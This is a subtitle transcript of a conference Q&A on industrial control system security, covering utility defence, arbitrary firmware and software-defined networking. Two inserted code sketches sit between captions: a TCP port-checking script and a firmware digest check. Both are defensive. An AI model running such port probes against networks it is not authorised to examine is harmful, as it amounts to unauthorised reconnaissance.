00:51:05,369 --> 00:51:08,089
Herald: There was a second
question from the Internet.
594
00:51:08,089 --> 00:51:14,179
Signal angel: Yes, so the second one is:
what should a non-technical person
595
00:51:14,179 --> 00:51:19,890
*incomprehensible* sent to manage a small town
596
00:51:19,890 --> 00:51:25,440
utility do as best practice?
Éireann: I think the first and most
597
00:51:25,440 --> 00:51:29,930
important thing is to look for attacks.
I'm sorry I should probably repeat that
598
00:51:29,930 --> 00:51:33,609
question just to be sure. What should
someone in a small town who manages
599
00:51:33,609 --> 00:51:37,420
a utility do to defend and protect
themselves. So the first thing is
600
00:51:37,420 --> 00:51:43,129
look for attacks. Even if you spend a few
hours a week looking for something: you
601
00:51:43,129 --> 00:51:46,249
script something up or you hire some
college kid to come in and script
602
00:51:46,249 --> 00:51:49,579
something and look for things on your
network and ask questions and yes they're
603
00:51:49,579 --> 00:51:52,279
going to be a pain in the ass and it's going
to be difficult. But you're going to learn
604
00:51:52,279 --> 00:51:55,599
things about your network and you might
detect some attacks. The first problem in
605
00:51:55,599 --> 00:52:01,059
utilities is no one is responsible for
security. "It's not my job" is kind of
606
00:52:01,059 --> 00:52:05,480
the mantra. So for a small utility, find
someone whose job it is. If you're a very
607
00:52:05,480 --> 00:52:09,130
small utility, there are probably some other
small utilities near you and you can hire
608
00:52:09,130 --> 00:52:13,789
a resource together to come and visit your
different utilities and help you out. The
609
00:52:13,789 --> 00:52:17,380
second one is: watch your relationship with
your vendor. When you purchase this
610
00:52:17,380 --> 00:52:21,220
equipment you spend a lot of money on it.
Spend a little bit of time doing
611
00:52:21,220 --> 00:52:25,069
penetration tests. Yes I like it when you
hire me but you don't have to hire me.
612
00:52:25,069 --> 00:52:28,071
There are plenty of other people you can
hire who will have a look at the device
613
00:52:28,071 --> 00:52:31,770
and find the simple vulnerabilities. So
when you purchase something make sure you
614
00:52:31,770 --> 00:52:35,469
test it for security purposes and that's
very important because you can even put
615
00:52:35,469 --> 00:52:40,879
into your contract: if you fail the
security tests, we will pay you less money.
616
00:52:40,879 --> 00:52:44,480
And the vendors are not going to react
to security until you do that. So that's
617
00:52:44,480 --> 00:52:51,429
the second answer. And I wish I had a
third to make it very neat but I don't.
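A minimal sketch of the "spend a few hours a week looking" advice, with placeholder addresses and ports: poll the management services you expect on your known devices and flag anything that differs, which is the kind of question-raising check described above.

```python
import socket

# Placeholder inventory: device address -> management ports expected open.
EXPECTED = {
    "192.0.2.10": {443},      # switch reachable over HTTPS only
    "192.0.2.11": {22, 443},  # switch reachable over SSH and HTTPS
}
WATCHED_PORTS = [21, 22, 23, 80, 443, 8080]  # common management services

def open_ports(host: str, ports: list[int], timeout: float = 1.0) -> set[int]:
    """Return the subset of ports that accept a TCP connection."""
    found = set()
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex((host, port)) == 0:
                found.add(port)
    return found

for host, expected in EXPECTED.items():
    seen = open_ports(host, WATCHED_PORTS)
    unexpected = sorted(seen - expected)
    missing = sorted(expected - seen)
    if unexpected:
        print(f"{host}: unexpected open ports {unexpected} - ask why")
    if missing:
        print(f"{host}: expected service missing {missing}")
    if not unexpected and not missing:
        print(f"{host}: looks as expected")
```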
618
00:52:51,429 --> 00:52:55,729
Herald: OK. There was one more
question at mic 4 I think
619
00:52:55,729 --> 00:52:58,500
Questioner: Yes hi thank you for
your time.
620
00:52:58,500 --> 00:53:03,539
Herald: Talk into the mic please.
Question: Thank you for your talk. Hi. I'm kind of a
621
00:53:03,539 --> 00:53:12,739
newbie to the C3 community and I am not
sure about the question I want to ask you.
622
00:53:12,739 --> 00:53:16,579
Probably many people in this room
understand it, but I don't. I would like to
623
00:53:16,579 --> 00:53:23,780
ask you: what exactly do you
mean by arbitrary firmware?
624
00:53:23,780 --> 00:53:28,799
Éireann: No problem. So the question was
What do you mean by arbitrary firmware. I
625
00:53:28,799 --> 00:53:34,349
mean the firmware that I have altered that
was not manufactured by the vendor to do
626
00:53:34,349 --> 00:53:39,230
whatever I want. How do you trust that
this switch sends all the packets that it
627
00:53:39,230 --> 00:53:45,049
should send. What if it's, you know, my
handle is BSB right. What if it drops
628
00:53:45,049 --> 00:53:51,230
every packet that has BSB in the packet.
Right. You can rewrite a firmware image to
629
00:53:51,230 --> 00:53:54,950
do whatever the device can do and in some
cases more things than the device usually
630
00:53:54,950 --> 00:53:59,959
does to damage itself for example. So an
arbitrary firmware is one in which anyone
631
00:53:59,959 --> 00:54:03,489
writes the firmware and there is no
checking to be sure that this is the image
632
00:54:03,489 --> 00:54:08,490
that you want on this device whether it's
provided by the vendor or the community
633
00:54:08,490 --> 00:54:13,239
right. You still want checking that this
is the correct code or the code that you
634
00:54:13,239 --> 00:54:18,309
wanted anyway. Right.
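One simple counter to arbitrary firmware, sketched here with placeholder values: before uploading an image, compare its digest against one the vendor publishes over a separate trusted channel (a signature check would be stronger, if the vendor signs images).

```python
import hashlib
import sys

IMAGE = "switch_firmware_v2.3.bin"  # placeholder downloaded image
PUBLISHED_SHA256 = "0" * 64         # placeholder vendor-published digest

digest = hashlib.sha256()
with open(IMAGE, "rb") as f:
    for chunk in iter(lambda: f.read(65536), b""):
        digest.update(chunk)

if digest.hexdigest() != PUBLISHED_SHA256:
    sys.exit("digest mismatch: do NOT flash this image")
print("digest matches the published value - safe to proceed with the upgrade")
```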
Herald: Okay thank you. Is that a question
635
00:54:18,309 --> 00:54:22,489
here mic 1? OK go ahead.
Questioner: Yes please. In your
636
00:54:22,489 --> 00:54:29,739
hypothetical question, you asked what
damage could I do in that paint factory.
637
00:54:29,739 --> 00:54:39,690
But you can also reverse it. What kind of
company secrets can I obtain for example,
638
00:54:39,690 --> 00:54:45,859
your favorite recipe for your hot
chocolate or the recipes of Coca-Cola.
639
00:54:45,859 --> 00:54:52,839
They are vulnerable as well aren't they.
Éireann: Yes. So the question just again
640
00:54:52,839 --> 00:54:56,559
for everyone else. You don't just have to
talk about damage in a paint factory or
641
00:54:56,559 --> 00:55:01,819
any industrial system. You can also talk
about intellectual property and protecting
642
00:55:01,819 --> 00:55:07,309
the recipes that we use to bake cookies or
make beer or whatever pharmaceuticals
643
00:55:07,309 --> 00:55:12,641
whatever. And that's a fantastic question
and I'm glad you brought it up. A couple of
644
00:55:12,641 --> 00:55:15,809
years ago when I was doing... well, more
than a couple of years like eight years
645
00:55:15,809 --> 00:55:19,249
ago, when I was doing industrial system
security I realized I wasn't getting a lot
646
00:55:19,249 --> 00:55:23,489
of traction. It was before Stuxnet, I was
a quality assurance guy. Everybody thought
647
00:55:23,489 --> 00:55:34,309
I was fucking crazy, right. Then Stuxnet:
career. It's wrong. It's really wrong. But
648
00:55:34,309 --> 00:55:39,579
the point is I tried to take that
approach. I tried to say you have a
649
00:55:39,579 --> 00:55:43,019
process in which you manufacture something
and you make money by the fact that that
650
00:55:43,019 --> 00:55:47,979
process is relatively secret and if you
don't care about defending your workers
651
00:55:47,979 --> 00:55:52,589
from being damaged then at least care
about the intellectual property because
652
00:55:52,589 --> 00:55:56,059
I'll get security in by some sort of back
door right. I'm a little bit of a security
653
00:55:56,059 --> 00:56:00,200
Machiavellian. I'll find a way to get
security into the system somehow. So I
654
00:56:00,200 --> 00:56:05,349
tried to say intellectual property you
should be protected. And I found that they
655
00:56:05,349 --> 00:56:09,320
didn't care so much. I mean maybe you'll
have more luck, maybe post-Stuxnet
656
00:56:09,320 --> 00:56:14,069
that's a better argument. I hope you do.
But it is an important question as well.
657
00:56:14,069 --> 00:56:18,719
Right. It's not, it's not just potential
for damage. I think there's a lot more
658
00:56:18,719 --> 00:56:25,459
espionage going on on these networks than
there is damage and sabotage.
Herald: Okay
659
00:56:25,459 --> 00:56:32,069
we'll take one more question on mic four.
Questioner: Thank you okay. My question
660
00:56:32,069 --> 00:56:38,319
concerns the concepts of software defined
networking and OpenFlow. So when I first
661
00:56:38,319 --> 00:56:44,880
heard about software defined networking I
thought well this is a huge security issue
662
00:56:44,880 --> 00:56:50,589
and there may be huge vulnerabilities.
After your joke I think this might
663
00:56:50,589 --> 00:56:56,420
actually be a good idea to dumb down the
switches and put the intelligence
664
00:56:56,420 --> 00:57:01,900
somewhere locked up in a safe place.
What's your opinion on that. Can they
665
00:57:01,900 --> 00:57:05,839
actually improve security.
Éireann: Yes. So the question is what role
666
00:57:05,839 --> 00:57:09,969
could software defined networking play in
these sorts of environments. And is it a
667
00:57:09,969 --> 00:57:15,210
good idea from a security perspective.
Anytime someone has a revolution in
668
00:57:15,210 --> 00:57:19,240
computing we also have to update our
security paradigm. So I think with
669
00:57:19,240 --> 00:57:23,039
software defined networking it's not
whether it's good or bad it's that you
670
00:57:23,039 --> 00:57:28,339
defend that network differently than you
defend one of these networks. So it's not
671
00:57:28,339 --> 00:57:31,400
so much that it's good or bad, it's
neutral if you know how to defend your
672
00:57:31,400 --> 00:57:34,779
network. I don't care what it is. As long
as someone is looking to defend it and
673
00:57:34,779 --> 00:57:38,989
cares about how the flows are working. So
I think software defined networking in
674
00:57:38,989 --> 00:57:42,449
these environments could be a very good
thing but the refresh rate on these
675
00:57:42,449 --> 00:57:45,799
devices is not that high. So I don't think
we'll see it there for a little while even
676
00:57:45,799 --> 00:57:50,859
though it might be a good thing
philosophically. It takes 5, 10, 15, 20 years
677
00:57:50,859 --> 00:57:56,410
to refresh these networks so it'll be a little
while. But it's not good or bad. It's just
678
00:57:56,410 --> 00:57:59,909
learn to defend what you've got, that is the
problem, right.
679
00:57:59,909 --> 00:58:06,489
Questioner: Okay thanks a lot.
Herald: Okay okay let's give a big hand
680
00:58:06,489 --> 00:58:09,639
for Éireann and thank you.
Éireann: Thank you
681
00:58:09,639 --> 00:58:13,320
applause
682
00:58:13,320 --> 00:58:24,000
subtitles created by c3subtitles.de
Join, and help us!